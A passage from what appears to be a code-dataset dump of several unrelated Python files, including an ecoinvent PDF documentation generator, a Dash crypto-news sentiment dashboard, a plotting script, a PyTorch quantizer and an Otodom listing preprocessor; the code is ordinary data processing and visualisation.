preserveAspectRatio = True)\n canvas.drawCentredString(PAGE_WIDTH/2.0, 35, 'page %s' % canvas.getPageNumber())\n canvas.restoreState()\n def myLaterPages(canvas, doc):\n canvas.saveState()\n if canvas.getPageNumber() == 1:\n canvas.setFont('Helvetica-Bold',16)\n header_text = 'Ecoinvent %s dataset documentation' % version\n canvas.drawCentredString(PAGE_WIDTH/2.0, PAGE_HEIGHT-35, header_text)\n canvas.setFont('Helvetica',9)\n height = 50\n else:\n canvas.setFont('Helvetica', 9)\n header_text = 'Ecoinvent %s dataset documentation' % version\n canvas.drawCentredString(PAGE_WIDTH/2.0, PAGE_HEIGHT-35, header_text)\n height = 45\n for piece in pieces:\n canvas.drawCentredString(PAGE_WIDTH/2.0, PAGE_HEIGHT-height, piece)\n height += .15*inch\n canvas.drawImage(logo_path, MARGIN*1.3, 750, width = inch, preserveAspectRatio = True)\n canvas.drawCentredString(PAGE_WIDTH/2.0, 35, 'page %s' % canvas.getPageNumber())\n canvas.restoreState()\n doc.pageTemplates[0].beforeDrawPage = myFirstPage\n doc.pageTemplates[1].beforeDrawPage = myLaterPages\n doc.build(Story)\n return doc\ndef find_total_score(f):\n for exc in f.ReferenceProduct:\n if exc.amount != 0:\n break\n ie = (f.activityName, f.geography, exc.name)\n #gff.corrections(ie_name)\n scores = utils.pkl_load(scores_path, str(indexes.toggle['ie'][ie]))\n total_scores = []\n for LCIA_for_contribution in indicators_for_contrib:\n try:\n total_scores.append(scores[indexes.toggle['LCIA'][LCIA_for_contribution],0])\n except IndexError:\n total_scores.append(scores[0,indexes.toggle['LCIA'][LCIA_for_contribution]])\n return total_scores\ndef contribution_to_impact_legend(Story):\n if len(indicators_for_contrib_short) > 0:\n t = 'Impact contribution legend: %s, %s' % (\n ' | '.join(indicators_for_contrib_short), \n 'relative to dataset total score')\n Story.append(Paragraph(t, small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n return Story\ndef filelist_with_filtered_ao(ao):\n filelist = set()\n if 1:\n sel = ao[ao['activityName'].isin([\n 'market for methanol'])]\n sel = sel[sel['geography'].isin(['GLO'])]\n filelist.update(set(sel['filename']))\n elif 0:\n sel = ao[ao['activityName'] == 'electricity, high voltage, production mix']\n sel = 
sel[sel['geography'].isin(['ENTSO-E'])]\n filelist.update(set(sel['filename']))\n else:\n ao = ao.set_index(['activityName', 'geography']).sort_index(level=0)\n indexes = [('electricity production, photovoltaic, 3kWp slanted-roof installation, single-Si, panel, mounted', 'CH'), \n ('heat production, at heat pump 30kW, allocation exergy', 'CH'), \n('operation, solar collector system, Cu flat plate collector, multiple dwelling, for hot water', 'CH'), \n('heat production, natural gas, at boiler condensing modulating <100kW', 'CH'), \n('heat production, wood pellet, at furnace 300kW, state-of-the-art 2014', 'CH'), \n('tap water production, conventional treatment', 'CH'), \n('paper production, woodfree, coated, at non-integrated mill', 'RER'), \n('treatment of wastewater, average, capacity 1.6E8l/year', 'CH'), \n('treatment of waste paper, unsorted, sorting', 'CH'), \n('treatment of municipal solid waste, municipal incineration with fly ash extraction', 'CH'), \n('treatment of biowaste by anaerobic digestion', 'CH'), \n('treatment of used industrial electronic device, manual dismantling', 'CH'), \n('transport, passenger car', 'RER'), \n('transport, passenger train, regional', 'CH'), \n('transport, passenger, aircraft, intercontinental', 'RER'), \n('transport, passenger, aircraft, intracontinental', 'RER'), \n('transport, passenger, electric bicycle', 'CH'), \n ]\n sel = ao.loc[indexes]\n filelist.update(set(sel['filename']))\n return list(filelist)\ndef link_to_ecoQuery(serialization_mapping, f, system_model):\n if system_model == 'undefined':\n index = ('Undefined', f.activityName, f.geography, '')\n else:\n ref = f.get_reference_product()\n if system_model == 'cut-off':\n index = ('Allocation, cut-off', f.activityName, f.geography, ref.name)\n elif system_model == 'consequential':\n index = ('Consequential', f.activityName, f.geography, ref.name)\n elif system_model == 'APOS':\n index = ('Allocation, APOS', f.activityName, f.geography, ref.name)\n else:\n 1/0\n sel = serialization_mapping.loc[index]\n sel = sel.drop_duplicates(['STARTDATE', 'ENDDATE'])\n if type(sel) == pandas.core.frame.DataFrame:\n if len(sel) != 1:\n 1/0\n sel = sel.iloc[0]\n link = sel['UPR link']\n return link\ndef open_access(ao, dataset_folder):\n folder = os.path.join(utils.db_basepath, version, system_model, 'other')\n filename = '124 open access datasets.xlsx'\n df = read_excel(os.path.join(folder, filename), '124 open access datasets')\n ao_ = ao.set_index(['activityName', 'geography', 'Product']).sort_index(level=0)\n filelist = []\n for index in df.index:\n index1 = tuple(df.loc[index, ['Activity', 'Geography', 'Product']])\n if index1 in set(ao_.index):\n sel = ao_.loc[index1]\n if type(sel) == pandas.core.frame.DataFrame:\n sel = sel.iloc[0]\n filelist.append(sel['filename'])\n filename_option = 'cute'\n result_filename = os.path.join(os.path.dirname(dataset_folder), \n 'open access PDF documentation')\n if not os.path.exists(result_filename):\n os.makedirs(result_filename)\n return filelist, filename_option, result_filename\ndef LCI(Story, ee_index, ie_index, LCI_path):\n ie = (f.activityName, f.geography, f.get_reference_product().name)\n g = utils.pkl_load(LCI_path, str(ie_index.toggle['ie'][ie]))\n group_ee = {}\n for compartment in ['air', 'water', 'soil', 'natural resource']:\n group_ee[compartment] = []\n for ee in ee_index:\n group_ee[ee[1]].append(ee)\n Story.append(Spacer(1, inter_par_dist))\n Story.append(Paragraph('Life cycle inventory', title_style))\n Story.append(Spacer(1, inter_par_dist))\n 
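#g appears to be the cumulative LCI vector of this dataset loaded from the pkl store; ee_index maps an elementary exchange tuple (name, compartment, subcompartment) to its row, so g[ee_index[ee], 0] is the inventory amount written in the table below\n    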
table_content = [[Paragraph('name', large_table_style), \n Paragraph('compartment', large_table_style), \n Paragraph('subcompartment', large_table_style), \n Paragraph('unit', large_table_style), \n Paragraph('amount', large_table_style), \n ]]\n colWidths = [3.0*inch, 1.0*inch, 1.3*inch, 0.5*inch, 1.0*inch]\n for compartment in ['air', 'water', 'soil', 'natural resource']:\n for ee in group_ee[compartment]:\n table_row = [Paragraph(ee[0], large_table_style), \n Paragraph(ee[1], large_table_style), \n Paragraph(ee[2], large_table_style), \n Paragraph(indexes.units[ee], large_table_style), \n ]\n if g[ee_index[ee]] != 0.:\n c = utils.arrange_float(g[ee_index[ee], 0], \n switch_sci = 6, significative_digits = 3)\n table_row.append(Paragraph(c, large_table_style))\n table_content.append(table_row)\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n table_style = deepcopy(h_header)\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n return Story\ndef restriction(Story):\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Restriction of use', title_style))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('The restrictions of use stipulated in the EULA remain applicable for this pdf documentation.
Copyright ecoinvent Centre, 2016', large_table_style))\n return Story\nif 0:\n indicators = [('IPCC 2007', 'climate change', 'GWP 100a'), \n ('IPCC 2013', 'climate change', 'GWP 100a'), \n ('ecological scarcity 2013', 'total', 'total'),\n ('USEtox', 'human toxicity', 'carcinogenic'), \n ('USEtox', 'human toxicity', 'non-carcinogenic'), \n ('USEtox', 'ecotoxicity', 'total'), \n ('ReCiPe Endpoint (H,A)', 'human health', 'total'), \n ('ReCiPe Endpoint (H,A)', 'ecosystem quality', 'total'), \n ('ReCiPe Endpoint (H,A)', 'resources', 'total'), \n ('ReCiPe Endpoint (H,A)', 'total', 'total'), \n ]\n indicators_for_contrib = [('IPCC 2007', 'climate change', 'GWP 100a'), \n ('ecological scarcity 2013', 'total', 'total'),\n ('ReCiPe Endpoint (H,A)', 'total', 'total')]\n indicators_for_contrib_short = ['IPCC 2007 GWP100', 'ecoscarcity 2013 total', 'ReCiPe H total']\nelif 1:\n indicators = [\n ('IPCC 2007', 'climate change', 'GWP 100a'), \n ('IPCC 2013', 'climate change', 'GWP 100a')\n ]\n indicators_for_contrib = [('IPCC 2007', 'climate change', 'GWP 100a'), \n ('IPCC 2013', 'climate change', 'GWP 100a'), \n ]\n indicators_for_contrib_short = ['IPCC 2007 GWP100', \n 'IPCC 2013 GWP100'\n ]\nelse:\n indicators = [\n #('IPCC 2007', 'climate change', 'GWP 100a'), \n ('IPCC 2013', 'climate change', 'GWP 100a')\n ]\n indicators_for_contrib = [#('IPCC 2007', 'climate change', 'GWP 100a'), \n ('IPCC 2013', 'climate change', 'GWP 100a')\n ]\n indicators_for_contrib_short = [#'IPCC 2007 GWP100', \n 'IPCC 2013 GWP100'\n ]\n#pr = cProfile.Profile()\n#pr.enable()\nlogs = DataFrame()\n#version = '3.2'\nversion = '3.3'\nsystem_model = 'Allocation, APOS'\n#dataset_folder = r'C:\\python\\DB_versions\\%s\\Undefined\\datasets' % version\n#dataset_folder = r'C:\\python\\DB_versions\\%s\\Allocation, cut-off\\datasets' % version\n#dataset_folder = r'C:\\python\\DB_versions\\%s\\consequential\\datasets' % version\ndataset_folder = os.path.join(utils.db_basepath, version, system_model, 'datasets')\n#dataset_folder = r'C:\\Users\\Guillaume\\Desktop\\emilia'\n#dataset_folder = r'C:\\python\\documentation_generator\\test_datasets_spold'\n#filename_option = 'official'\nfilename_option = 'cute'\n#filename_option = 'official'\nprint_LCI = False\n#manual_system_model = 'undefined'\n#manual_version = '3.2'\nsystem_model_found = False\nfor system_model in ['Undefined', 'Allocation, cut-off', 'Consequential', 'Allocation, APOS']:\n if system_model in dataset_folder:\n system_model_found = True\n break\nif not system_model_found:\n #system_model = manual_system_model\n pass\nversion_found = False\n#for version in ['3.1', '3.2']:\n# if version in dataset_folder:\n# version_found = True\n# break\nfolder = os.path.join(utils.db_basepath, version, system_model, 'pkl')\nao = utils.pkl_load(folder, 'ao')\nao_for_AL = ao.set_index(['id', 'name']).sort_index(level=0)\nMD = utils.pkl_load(folder, 'MD')\nif 'undefined' != system_model:\n folder = os.path.join(utils.db_basepath, version, system_model)\n A, B, C, indexes, Z = utils.load_matrices(folder)\n \n new = {}\n #for ie in ie_index:\n # if ie != gff.corrections(ie):\n # new[gff.corrections(ie)] = ie_index[ie]\n #ie_index.update(new)\n scores_path = os.path.join(utils.db_basepath, version, system_model, 'pkl', 'LCIA')\n LCI_path = os.path.join(utils.db_basepath, version, system_model, 'pkl', 'LCI')\n LCIA_for_contribution = ('IPCC 2013', 'climate change', 'GWP 100a')\nfolder = os.path.join(utils.db_basepath, version, 'pkl')\nfilename = 'version_%s_url' % version\ntry:\n serialization_mapping 
= utils.pkl_load(folder, filename)\n fields = ['system model', 'activity name', 'geography', 'reference product']\n serialization_mapping = serialization_mapping.set_index(\n fields).sort_index(level=0)\nexcept IOError:\n serialization_mapping = ''\nexcept TypeError:\n serialization_mapping = ''\nfolder = os.path.join(utils.db_basepath, version, 'Undefined', 'pkl')\nao_undefined = utils.pkl_load(folder, 'ao')\nao_undefined = ao_undefined.set_index(['activityName', 'geography'], drop = False).sort_index(level=0)\nundefined_dataset_folder = os.path.join(utils.db_basepath, version, 'undefined', 'datasets')\nao = ao.set_index('id', drop = False)\nMD['Persons'] = MD['Persons'].set_index('id', drop = False)\nMD['Companies'] = MD['Companies'].set_index('id', drop = False)\nMD['Geographies'] = MD['Geographies'].set_index('shortname', drop = False)\nMD['Sources'] = MD['Sources'].set_index('id', drop = False)\nif 'test_dataset' in dataset_folder:\n result_folder = r'C:\\python\\documentation_generator\\test_datasets_PDF'\nelse:\n result_folder = os.path.join(utils.db_basepath, version, system_model, 'pdf_documentation')\n if not os.path.exists(result_folder):\n os.makedirs(result_folder)\n#result_folder = r'C:\\python\\documentation_generator\\test_datasets_PDF'\nif 0:\n folder = r'C:\\python\\DB_versions\\3.3\\Allocation, cut-off\\excel'\n filename = 'pdf_to_produce.xlsx'\n tab = 'Sheet1'\n filelist = pandas.read_excel(os.path.join(folder, filename), tab)\n filelist = [tuple(sel) for i, sel in filelist.iterrows()]\n ao_ = ao.set_index(['activityName', 'geography', 'name']).sort_index(level=0)\n filelist = list(ao_.loc[filelist, 'filename'])\nelse:\n #filelist = utils.build_file_list(dataset_folder, extension = 'spold')\n #filelist = ['018a92b5-f344-4feb-b024-42e1b501a4fe_f593c5c2-0980-43e9-8f70-617142b07bd6.spold']\n filelist = filelist_with_filtered_ao(ao)\n def filelist_with_other_filter():\n date = '2016-07-01'\n folder = r'C:\\python\\DB_versions\\%s\\Undefined\\pkl' % date\n filtered_filelist = utils.pkl_load(folder, 'filelist')\n return list(filtered_filelist)\n #filelist = filelist_with_other_filter()\n #filelist, filename_option, result_folder = open_access(ao, dataset_folder)\n#adjust code so that datasets can be from mixed system models\nstart = time.time()\ncounter = 0\n#start_at = 12491\nstart_at = 0\nstop_at = len(filelist)\n#stop_at = start_at +1\nexchange_summary = {'Undefined': exchange_summary_undefined, \n 'Allocation, cut-off by classification': exchange_summary_cutoff, \n 'Allocation at the point of substitution': exchange_summary_APOS, \n 'Allocation, ecoinvent default': exchange_summary_APOS, \n 'Substitution, consequential, long-term': exchange_summary_consequential}\nfolder = os.path.join(utils.script_folder, 'modules', 'release', 'documentation')\nfilename = 'market_general_comment.xlsx'\nmarket_comments = read_excel(os.path.join(folder, filename), 'Sheet1')\nmarket_comments['specialActivityType'] = market_comments['specialActivityType']\nmarket_comments = market_comments.set_index(['systemModelName', \n 'specialActivityType', 'field']).sort_index(level=0)\nmarket_comments = market_comments.loc[system_model]\nreport = {}\nimage_report = {}\nalready_present = utils.build_file_list(result_folder)\nalready_present = []\nfor i in pyprind.prog_bar(range(start_at, stop_at), title = 'iterating datasets'):\n image_counter = 0\n start2 = time.time()\n counter += 1\n print(system_model, i, 'of', len(filelist))\n filename = filelist[i]\n #filename = 
'06e8913f-3e2c-4243-bc62-9282e6de8587_7fe99768-d571-4bc2-a272-7df585bd0d48.spold'\n f = spold2.Dataset(dataset_folder, filename, ao_for_AL = ao_for_AL, all_fields = True)\n if filename_option == 'cute':\n exc = f.get_reference_product()\n if system_model == 'undefined':\n result_filename = 'v%s - %s - %s - %s.pdf' % (version, \n system_model, f.activityName, f.geography)\n else:\n result_filename = 'v%s - %s - %s - %s - %s.pdf' % (version, \n system_model, f.activityName, f.geography, exc.name)\n result_filename = result_filename.replace('/', '_')\n result_filename = utils.replace_HTML_entities(result_filename)\n elif filename_option == 'official':\n if system_model == 'undefined':\n result_filename = '%s.pdf' % f.id\n else:\n result_filename = '%s_%s.pdf' % (f.id, f.get_reference_product().intermediateExchangeId)\n else:\n result_filename = f.filename.split('.')[0] + '.pdf'\n if result_filename not in already_present:\n Story = []\n Story, logs = dataset_id(f, Story, ao, logs, \n serialization_mapping, system_model)\n Story.append(Spacer(1, small_spacer))\n Story = dataset_authorship(f, Story, MD)\n exchange_df = build_exchange_df(f)\n #exchange_df = exchange_df[exchange_df['group'] == 'ReferenceProduct']\n exchange_df = exchange_df[exchange_df['amount'] != 0.]\n Story.append(Paragraph('
Exchange summary', title_style_TOC))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('<font color=\"%s\">Back to table of content</font>' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story, footnotes = exchange_summary[f.get('modellingAndValidation').get('systemModelName')](exchange_df, Story)\n if not hasattr(f, 'dataGeneratorAndPublication') or f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n Story = exchange_summary_elementary(exchange_df, Story)\n Story = write_footnotes(Story, footnotes)\n Story.append(Spacer(1, inter_par_dist))\n Story.append(Paragraph('Dataset description', \n title_style_TOC))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph(\n '<font color=\"%s\">Back to table of content</font>' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story, logs, image_counter, image_report = TTextAndImage_print(f, Story, 'General comments', \n 'generalComment', logs, market_comments, image_counter, image_report)\n Story = text_comments(f, Story, market_comments)\n for field, tag in [['Technology comments', 'technologyComment'], \n ['Allocation comments', 'allocationComment'], \n ['Geography comments', 'geographyComment'], \n ['Time period comments', 'timePeriodComment']]:\n Story, logs, image_counter, image_report = TTextAndImage_print(f, Story, field, \n tag, logs, market_comments, image_counter, image_report)\n Story.append(Spacer(1, small_spacer))\n if not hasattr(f, 'dataGeneratorAndPublication') or f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n if f.specialActivityType != 0 and system_model != 'Undefined':\n Story, logs = Technosphere_table_linked_market(f, exchange_df, Story, ao, logs, A)\n else:\n Story, logs = Technosphere_table(f, exchange_df, Story, ao, logs, A)\n Story, logs = Environment_table(f, exchange_df, Story, logs)\n if f.get('modellingAndValidation').get('systemModelName') != 'Undefined':\n Story, ie = impact_scores(Story, f)\n Story = print_source_list(Story, exchange_df, f, MD)\n if print_LCI:\n Story = LCI(Story, indexes, LCI_path)\n Story = restriction(Story)\n for j in range(len(Story)):\n Story[j].hAlign = 'LEFT'\n start3 = time.time()\n doc = MyDocTemplate(os.path.join(result_folder, result_filename))\n if '2016' in version:\n version = '3.3'\n try:\n doc = render(Story, f, doc, version)\n success = True\n except PermissionError:\n print('')\n print('close the damn file!')\n print('')\n print(result_filename)\n print('')\n 1/0\n except:\n success = False\n if 'spold' in result_filename:\n 1/0\n to_add = {'filename': result_filename, \n 'activityName': f.activityName, \n 'geography': f.geography, \n 'reference product': f.get_reference_product().name, \n 'nb exchanges': len(exchange_df), \n 'nb pages': doc.page, \n 'time': time.time() - start2,\n 'results only': f.dataGeneratorAndPublication.accessRestrictedTo not in [0, 1], \n 'image counter': image_counter, \n 'success': success\n }\n if success:\n to_add['file size (KB)'] = float(os.stat(os.path.join(result_folder, result_filename)\n ).st_size)/1000.\n report[len(report)] = copy(to_add)\n for key in to_add:\n print(key, ':', to_add[key])\n print('')\n if len(report) == 50:\n #break\n pass\nprint('files in', result_folder)\nreport = 
DataFrame(report).transpose()\nfilename = '%s_%s_report.xlsx' % (version, system_model)\ncols = ['activityName', 'geography', 'reference product', 'filename', \n 'time', 'file size (KB)', 'nb exchanges', 'nb pages', 'results only', 'image counter', 'success']\nreport.to_excel(os.path.join(result_folder, filename), cols = cols, \n merge_cells = False, index = False)\nfilename = '%s_%s_image_report.xlsx' % (version, system_model)\ncols = ['activityName', 'geography', 'reference product', 'filename', \n 'image url']\nimage_report = DataFrame(image_report).transpose()\nimage_report.to_excel(os.path.join(result_folder, filename), cols = cols, \n merge_cells = False, index = False)\nfor exc in f.get_all_exchanges():\n print(exc.name, exc.activityLinkId, exc.amount)","sub_path":"modules/release/pdf_generator_old.py","file_name":"pdf_generator_old.py","file_ext":"py","file_size_in_byte":101127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"405321739","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport seaborn as sns\nsys.path.append('../../../../scripts/')\nfrom fig_settings import configure_fig_settings\nsys.path.append('../../modules_gammak24/')\nfrom plotobservables import PlotObservables\n\n\n\n# see user_inputs.md for details on what typically goes in these inputs.\nc_1 = input(\"please type the first gamma k24 coordinate, with a comma delimiter: \")\n\n#c_2 = input(\"please type the second gamma k24 coordinate, with a comma delimiter: \")\n\n#c_3 = input(\"please type the third gamma k24 coordinate, with a comma delimiter: \")\n\n#c_list = [c_1,c_2,c_3]\n\nc_list = [c_1]\n\ncoordinates = np.array([[float(s) for s in arg.split(',')] for arg in c_list],float)\n\n\nwidth = 3.487\nheight = width\n\nobservable_list = ['E','R','eta','delta','surfacetwist']\n\nconfigure_fig_settings()\n\nfig = {}\nax = {}\n\nfor observable in observable_list:\n \n fig[observable],ax[observable] = plt.subplots()\n\n fig[observable].set_size_inches(width,height)\n\n\ncolors = sns.color_palette()\n\nfor scan_dir in [\"scanforward\",\"scanbackward\"]:\n for i,coordinate in enumerate(coordinates):\n \n gamma,k24 = coordinate\n obs = PlotObservables(gamma,k24,scan_dir=scan_dir)\n obs.sort_observables()\n \n for j,observable in enumerate(observable_list):\n if scan_dir == \"scanforward\":\n obs.plot_observable_omega_eq_Lambda(ax[observable],observable,\n label=fr'$\\gamma_s,k_{{24}}={gamma},{k24}$',\n color=colors[j])\n else:\n obs.plot_observable_omega_eq_Lambda(ax[observable],observable,\n color=colors[j])\nxlabel = r'$\\omega=\\Lambda$'\n\nfor observable in observable_list:\n\n if observable == 'surfacetwist':\n ylabel = r'$\\psi(R)$'\n elif len(observable) > 1:\n ylabel = fr'$\\{observable}$'\n else:\n ylabel = fr'${observable}$'\n\n ax[observable].set_xlabel(xlabel)\n ax[observable].set_ylabel(ylabel)\n ax[observable].legend(frameon=False)\n fig[observable].tight_layout()\n fig[observable].savefig(obs.observable_sname(observable))\n\n\n\nplt.show()\n","sub_path":"gradient_descent_cos_in_denom/experiments/2018-12-05/gamma-k24-space-runs/observables_plot.py","file_name":"observables_plot.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49159843","text":"import math\nimport torch\n\nclass Quantizer:\n def __init__(self, mask) -> None:\n super().__init__()\n self.max = 32 # use no more than 5 bit (2^5 -> 32) for storage\n self.mask = 
mask # less than 5\n\n def quantify(self, activation_value):\n with torch.no_grad():\n rand = torch.rand(activation_value.shape).cuda() - 0.5\n activation = activation_value * self.max / 2\n compression_code = (activation / math.pow(2, self.mask) + rand).ceil()\n compression_code = torch.clamp(compression_code, 1 - math.pow(2, 4 - self.mask), math.pow(2, 4 - self.mask))\n eps = compression_code - activation_value\n compression = activation_value + eps\n return compression\n\n def restore(self, compression_code):\n with torch.no_grad():\n compression = compression_code * math.pow(2, self.mask)\n activation_value = compression / (self.max / 2)\n eps = activation_value - compression_code\n activation = compression_code + eps\n return activation","sub_path":"Data-Driven E2E Latency Estimation/1.Latency Sample Generation/1)Profiling and Modeling/(2)Services/b.Defect Detection/Train/3.ensemble/utils/quantization.py","file_name":"quantization.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"391696846","text":"from .diarization.diarization import diarize_all\n# from .EmotionsRecognizer.predict_mixed import prognoze_data\nimport sys\n\n\ndef pipeline(path_folder, gpu=False):\n name_folder = path_folder.split('/')[-2]\n diarize_all(name_folder, gpu)\n # prognoze_data(name_folder)\n\n\nif __name__ == '__main__':\n pipeline(sys.argv[1], True)","sub_path":"src/pipeline_1.py","file_name":"pipeline_1.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"212691357","text":"#!/usr/bin/python3.7\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\n#from plotly.subplots import make_subplots\nimport pandas as pd\nimport dash_table\nimport os\nimport dash_bootstrap_components as dbc\nfrom datetime import datetime as dt\n\napp = dash.Dash(external_stylesheets=[dbc.themes.FLATLY])\n\nmy_path = os.path.abspath(os.path.dirname(__file__))\npath = f'{my_path}/df_data/df_clean.pkl'\ndf_daily = pd.read_pickle(f'{path}')\n#df_daily = df_daily.fillna(0)\ndf = df_daily['2020-05-29':]\ndf['date'] = df.index.strftime('%x, %X')\ndf['avg_score'] = round(df['avg_score'], 2)\n\napp.layout = html.Div([\n dbc.Row([\n dbc.Col([\n html.Div([\n html.H1('CryptoNews'),\n dcc.Markdown('An interactive dashboard by [Manohar Sitapati](https://www.linkedin.com/in/manoharsitapati/).'),\n dcc.Markdown('Detailed documentation and code are available on [GitHub](https://github.com/TheManohar/CryptoNews#readme).')\n ], style={'padding':10}),\n html.Div([\n html.H3('Pick a Keyword'),\n dcc.Dropdown(\n id='coin-selector',\n options=[\n {'label': 'Crypto', 'value': 'crypto'},\n {'label': 'Bitcoin', 'value': 'bitcoin'},\n {'label': 'Ethereum', 'value': 'ethereum'}\n ],\n value='bitcoin',\n clearable=False\n )\n ], style={'padding':10}),\n html.Div([\n html.H3('Pick a Date Range'),\n dcc.DatePickerRange(\n id='date-picker',\n min_date_allowed=dt(2020, 5, 29),\n initial_visible_month=dt.today(),\n first_day_of_week=1\n )\n ], style={'padding':10})\n ], width=3),\n dbc.Col([\n html.Div([\n dcc.Graph(\n id='graph-1',\n config={'displayModeBar':False}\n )\n ],\n style={'padding':10}\n )\n ])\n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n dash_table.DataTable(\n id='table-1',\n columns=[\n {'name': 'Date', 'id': 'date'},\n {'name': 'Source', 'id': 
'source'},\n {'name': 'Title', 'id': 'title'},\n {'name': 'Description', 'id': 'description'},\n {'name': 'Score', 'id': 'avg_score'}\n ],\n style_cell={\n 'textAlign': 'left',\n 'padding': '5px',\n 'whiteSpace': 'normal',\n 'height': 'auto',\n 'textOverflow': 'ellipsis',\n 'overflow': 'hidden',\n 'maxWidth': '800px'\n },\n style_cell_conditional=[\n {'if': {'column_id': 'title'},\n 'maxWidth': '600px'},\n {'if': {'column_id': 'description'},\n 'maxWidth': '800px'},\n ],\n sort_by=[{'column_id':'date', 'direction':'desc'}],\n filter_action=\"native\",\n sort_action=\"native\",\n sort_mode=\"multi\",\n page_action=\"native\",\n page_current= 0,\n page_size= 10\n )\n ])\n ])\n ], style={'padding-left':40, 'padding-right':40})\n])\n\n@app.callback(\n Output('graph-1', 'figure'),\n [Input('coin-selector', 'value'),\n Input('date-picker', 'start_date'),\n Input('date-picker', 'end_date')\n ])\ndef update_graph(coin, start_date, end_date):\n dff = df[df[str(coin)] == True]\n dff = dff[start_date:end_date]\n dff_as = pd.DataFrame()\n dff_as['avg_score'] = dff['avg_score'].resample('H').mean()\n dff_as['mvn_avg'] = dff_as['avg_score'].rolling('12h').mean()\n dff_as.fillna(0, inplace=True)\n dff_as = round(dff_as,2)\n dff_ac = pd.DataFrame()\n dff_ac['count'] = dff[str(coin)].resample('H').sum()\n dff_ac.fillna(0, inplace=True)\n bins=[0,1,2,3,99]\n colors=['tomato', 'orange', 'gold', 'lightgreen']\n dff_ac['color'] = pd.cut(dff_ac['count'], bins=bins, labels=colors)\n\n return {\n 'data': [\n go.Scatter(\n name=' Hourly Score',\n x=dff_as.index,\n y=dff_as['avg_score'],\n mode='lines',\n opacity=0.8,\n line=dict(\n color='midnightblue',\n width=1\n )\n ),\n go.Scatter(\n name='Moving Average',\n x=dff_as.index,\n y=dff_as['mvn_avg'],\n mode='lines',\n fill='tozeroy',\n opacity=0.8,\n line=dict(\n color='darkorange',\n width=2\n )\n ),\n go.Bar(\n name = 'Article Count',\n x=dff_ac.index,\n y=dff_ac['count'],\n yaxis='y2',\n opacity=0.5,\n marker=dict(\n color=dff_ac['color']\n )\n )\n ],\n 'layout': go.Layout(\n legend=dict(\n orientation='h',\n x=-0,\n y=1.1\n ),\n yaxis = dict(\n #tickformat=\".2%\",\n showticklabels=False,\n rangemode='tozero',\n range=[-1, 1],\n showgrid=False\n ),\n yaxis2 = dict(\n overlaying='y',\n side='right',\n rangemode='tozero',\n range=[0, 50],\n showgrid=False,\n ),\n xaxis = dict(\n showgrid=True,\n rangeselector=dict(\n buttons=list([\n dict(\n count=24,\n label=\"24h\",\n step=\"hour\",\n stepmode=\"backward\"\n ),\n dict(\n count=7,\n label=\"1w\",\n step=\"day\",\n stepmode=\"backward\"\n ),\n dict(\n count=1,\n label=\"1m\",\n step=\"month\",\n stepmode=\"backward\"\n ),\n dict(\n step=\"all\"\n )\n ])\n ),\n rangeslider = dict(\n visible=True,\n borderwidth=1,\n thickness=0.01\n ),\n tickformat = '%a %d-%m
 %H:%M',\n type = \"date\",\n range=[df.index[-1]-pd.DateOffset(30), df.index[-1]]\n ),\n margin={'l': 40, 'b': 40, 't': 10, 'r': 0},\n dragmode= 'pan'\n )\n }\n\n@app.callback(\n Output('table-1', 'data'),\n [Input('coin-selector', 'value'),\n Input('date-picker', 'start_date'),\n Input('date-picker', 'end_date')\n ])\ndef update_table(coin, start_date, end_date):\n dff = df[df[str(coin)] == True]\n dff = dff[start_date:end_date]\n return dff.to_dict('records')","sub_path":"dash_app.py","file_name":"dash_app.py","file_ext":"py","file_size_in_byte":7833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"509211071","text":"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport os\r\nfrom datetime import datetime\r\nfrom textwrap import wrap\r\nfrom langdetect import detect\r\n\r\nclass Preprocessing_Otodom:\r\n \"\"\"\r\n A class used to preprocess offer information from Otodom.pl.\r\n ...\r\n Attributes\r\n ----------\r\n apartment_details: name of apartments table\r\n information_types: columns of apartments table\r\n Methods\r\n -------\r\n remove_quotation_marks() -> pd.DataFrame:\r\n Remove quotation marks from columns.\r\n numeric_information() -> pd.DataFrame:\r\n Convert numeric information to float.\r\n remove_new_line_marks() -> pd.DataFrame:\r\n Remove new line marks from columns.\r\n prepare_table_information(table) -> pd.DataFrame:\r\n Change table information from list to dictionary and create external table from it.\r\n get_number(price_information: str) -> str:\r\n Get only numeric information of price from string.\r\n extract_price(apartment_details_price_table) -> pd.DataFrame:\r\n Extract price and currency from a string and convert price to float.\r\n prepare_additional_info(apartment_details_add_info_table, apartment_details_details_table) -> pd.DataFrame:\r\n Join additional information and details to additional information.\r\n prepare_description_table(apartment_details_description_table: pd.DataFrame) -> pd.DataFrame:\r\n Split description of 4000 characters to several columns and if record has more 